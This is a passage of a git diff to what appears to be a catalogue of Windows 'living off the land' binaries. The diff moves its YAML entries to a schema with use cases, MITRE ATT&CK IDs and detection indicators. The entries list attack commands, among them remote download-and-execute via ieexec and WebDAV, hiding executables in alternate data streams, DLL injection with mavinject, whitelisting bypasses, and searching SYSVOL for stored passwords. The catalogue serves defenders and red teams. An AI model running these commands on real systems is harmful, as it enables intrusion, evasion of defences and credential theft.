C:\Windows\System32\Expand.exe + - Path: C:\Windows\SysWOW64\Expand.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/infosecn1nja/status/986628482858807297 - - https://twitter.com/Oddvarmoe/status/986709068759949319 -Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/infosecn1nja/status/986628482858807297 + - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 +Acknowledgement: + - Person: Rahmat Nurfauzi + Handle: '@infosecn1nja' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index a858f1e..a35aabc 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,18 +1,27 @@ --- Name: Extexport.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Extexport.exe c:\test foo bar - Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll' + Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll + Usecase: Execute dll file + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Program Files\Internet Explorer\Extexport.exe ' - - C:\Program Files\Internet Explorer(x86)\Extexport.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Internet Explorer\Extexport.exe + - Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe +Code Sample: +- Code: +Detection: + - IOC: Extexport.exe loads dll and is execute from other folder the original path Resources: - - http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ -Notes: Thanks to Adam - @hexacorn - + - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 3d8febe..42f8bc9 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,24 +1,47 @@ --- Name: Extrac32.exe -Description: Add ADS, Download -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe - Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' + Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' + Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt - Description: 'Copy the source file to the destination file and overwrite it.' + Description: Copy the source file to the destination file and overwrite it. + Usecase: Download file from UNC/WEBDav + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\extrac32.exe - - c:\windows\sysWOW64\extrac32.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\extrac32.exe + - Path: C:\Windows\SysWOW64\extrac32.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - https://twitter.com/egre55/status/985994639202283520 -Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55 - + - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - Link: https://twitter.com/egre55/status/985994639202283520 +Acknowledgement: + - Person: egre55 + Handle: '@egre55' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 5945a9d..e8731af 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,23 +1,52 @@ --- Name: Findstr.exe -Description: Add ADS, Search -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' + Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream to hide from defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe - Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' - - Command: findstr /S /I cpassword \\\sysvol\\policies\*.xml - Description: 'Search for stored password in Group Policy files stored on SYSVOL.' + Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: findstr /S /I cpassword \\sysvol\policies\*.xml + Description: Search for stored password in Group Policy files stored on SYSVOL. + Usecase: Find credentials stored in cpassword attrbute + Category: Credentials + Privileges: User + MitreID: T1081 + MitreLink: https://attack.mitre.org/wiki/Technique/T1081 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe + Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. + Usecase: Download/Copy file from webdav server + Category: Download + Privileges: User + MitreID: T1185 + MitreLink: https://attack.mitre.org/wiki/Technique/T1185 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\findstr.exe - - c:\windows\sysWOW64\findstr.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\findstr.exe + - Path: C:\Windows\SysWOW64\findstr.exe +Code Sample: +- Code: +Detection: + - IOC: finstr.exe should normally not be invoked on a client system Resources: - - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 25c9393..81dbe0c 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -1,22 +1,39 @@ --- Name: Forfiles.exe -Description: Execute, Read ADS -Author: '' +Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.' + Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. + Usecase: Use forfiles to start a new process to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.' + Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. + Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\system32\forfiles.exe - - C:\Windows\sysWOW64\forfiles.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\forfiles.exe + - Path: C:\Windows\SysWOW64\forfiles.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/vector_sec/status/896049052642533376 - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/vector_sec/status/896049052642533376 + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Eric + Handle: '@vector_sec' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 3b457d9..656a194 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -1,22 +1,36 @@ --- Name: Gpscript.exe -Description: Execute -Author: '' +Description: Used by group policy to process scripts +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Gpscript /logon - Description: 'Executes logon scripts configured in Group Policy.' + Description: Executes logon scripts configured in Group Policy. + Usecase: Add local group policy logon script to execute file and hide from defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: Gpscript /startup - Description: 'Executes startup scripts configured in Group Policy.' + Description: Executes startup scripts configured in Group Policy + Usecase: Add local group policy logon script to execute file and hide from defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\gpscript.exe - - c:\windows\sysWOW64\gpscript.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\gpscript.exe + - Path: C:\Windows\SysWOW64\gpscript.exe +Code Sample: +- Code: +Detection: + - IOC: Scripts added in local group policy + - IOC: Execution of Gpscript.exe after logon Resources: - - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ -Notes: | - Thanks to Oddvar Moe - @oddvarmoe - Requires administrative rights and modifications to local group policy settings. - + - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 8f58fe0..c107bae 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -1,23 +1,35 @@ --- -Name: hh.exe -Description: Download, Execute -Author: '' +Name: Hh.exe +Description: Binary used for processing chm files in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: HH.exe http://www.google.com - Description: Opens google's web page with HTML Help. - - Command: HH.exe C:\ - Description: Opens c:\\ with HTML Help. - - Command: HH.exe c:\windows\system32\calc.exe - Description: 'Opens calc.exe with HTML Help.' - Command: HH.exe http://some.url/script.ps1 Description: Open the target PowerShell script with HTML Help. + Usecase: Download files from url + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: HH.exe c:\windows\system32\calc.exe + Description: Executes calc.exe with HTML Help. + Usecase: Execute process with HH.exe + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\hh.exe - - c:\windows\sysWOW64\hh.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\hh.exe + - Path: C:\Windows\SysWOW64\hh.exe +Code Sample: +- Code: +Detection: + - IOC: hh.exe should normally not be in use on a normal workstation Resources: - - https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -Notes: Thanks to Oddvar Moe - @oddvarmoe + - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Ie4unit.yml b/yml/OSBinaries/Ie4unit.yml index f0ca116..925013d 100644 --- a/yml/OSBinaries/Ie4unit.yml +++ b/yml/OSBinaries/Ie4unit.yml @@ -1,20 +1,29 @@ --- Name: Ie4unit.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: ie4unit.exe -BaseSettings - Description: 'Executes commands from a specially prepared ie4uinit.inf file.' + Description: Executes commands from a specially prepared ie4uinit.inf file. + Usecase: Get code execution by copy files to another location + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'c:\windows\system32\ie4unit.exe ' - - 'c:\windows\sysWOW64\ie4unit.exe ' - - 'c:\windows\system32\ieuinit.inf ' - - 'c:\windows\sysWOW64\ieuinit.inf ' -Code Sample: [] -Detection: [] + - Path: c:\windows\system32\ie4unit.exe + - Path: c:\windows\sysWOW64\ie4unit.exe + - Path: c:\windows\system32\ieuinit.inf + - Path: c:\windows\sysWOW64\ieuinit.inf +Code Sample: +- Code: +Detection: + - IOC: ie4unit.exe loading a inf file from outside %windir% Resources: - - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -Notes: Thanks to Jimmy - @bohops - + - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index a31f8c5..b3682a0 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -1,18 +1,35 @@ --- -Name: IEExec.exe -Description: Execute -Author: '' +Name: Ieexec.exe +Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: 'Executes bypass.exe from the remote server.' + - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\ieexec.exe - - c:\windows\sysWOW64\ieexec.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e1d6e54..86afd15 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -1,20 +1,28 @@ --- -Name: InfDefaultInstall.exe -Description: Execute -Author: '' +Name: Infdefaultinstall.exe +Description: Binary used to perform installation based on content inside inf files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: InfDefaultInstall.exe Infdefaultinstall.inf - Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.' + Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. + Usecase: Code execution + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\Infdefaultinstall.exe - - c:\windows\sysWOW64\Infdefaultinstall.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Infdefaultinstall.exe + - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe +Code Sample: +- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a +Detection: + - IOC: Resources: - - https://twitter.com/KyleHanslovan/status/911997635455852544 - - https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a - - https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ -Notes: Thanks to Kyle Hanslovan - @kylehanslovan - + - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 + - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ +Acknowledgement: + - Person: Kyle Hanslovan + Handle: '@kylehanslovan' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 2f575c3..9a02884 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -1,25 +1,42 @@ --- -Name: InstallUtil.exe -Description: Execute -Author: '' +Name: Installutil.exe +Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Description: 'Execute the target .NET DLL or EXE.' + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1118 + MitreLink: https://attack.mitre.org/wiki/Technique/T1118 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1118 + MitreLink: https://attack.mitre.org/wiki/Technique/T1118 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 - - http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md - - https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ + - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md + - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 210e4eb..5f73075 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -1,22 +1,44 @@ --- Name: Makecab.exe -Description: Package, Add ADS, Download -Author: '' +Description: Binary to package existing files into a cabinet (.cab) file +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab - Description: Compresses the target file and stores it in the target file. + Usecase: Hide data compressed into an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + Description: Download and compresses the target file and stores it in the target file. + Usecase: Download file and compress into a cab file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\makecab.exe - - c:\windows\sysWOW64\makecab.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\makecab.exe + - Path: C:\Windows\SysWOW64\makecab.exe +Code Sample: +- Code: +Detection: + - IOC: Makecab getting files from Internet + - IOC: Makecab storing data into alternate data streams Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index deb4bb3..012df46 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -1,22 +1,39 @@ --- Name: Mavinject.exe -Description: Execute, Read ADS -Author: '' +Description: Used by App-v in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll Description: Inject evil.dll into a process with PID 3110. + Usecase: Inject dll file into running process + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" - Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. + Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 + Usecase: Inject dll file into running process + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\mavinject.exe - - C:\Windows\SysWOW64\mavinject.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\mavinject.exe + - Path: C:\Windows\SysWOW64\mavinject.exe +Code Sample: +- Code: +Detection: + - IOC: mavinject.exe should not run unless APP-v is in use on the workstation Resources: - - https://twitter.com/gN3mes1s/status/941315826107510784 - - https://twitter.com/Hexcorn/status/776122138063409152 - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/gN3mes1s/status/941315826107510784 + - Link: https://twitter.com/Hexcorn/status/776122138063409152 + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Giuseppe N3mes1s + Handle: '@gN3mes1s' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 336c5fc..8b5bb46 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -1,27 +1,44 @@ --- -Name: Msbuild.exe -Description: Execute -Author: '' +Name: Msbuild.exe +Description: Used to compile and execute code +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. - - Command: msbuild.exe Msbuild.csproj - Description: Build and execute a C# project stored in the target CSPROJ file. + Usecase: Compile and run code + Category: AWL bypass + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.csproj + Description: Build and execute a C# project stored in the target csproj file. + Usecase: Compile and run code + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe +Code Sample: +- Code: +Detection: + - IOC: Msbuild.exe should not normally be executed on workstations Resources: - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md - - https://github.com/Cn33liz/MSBuildShell - - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - - 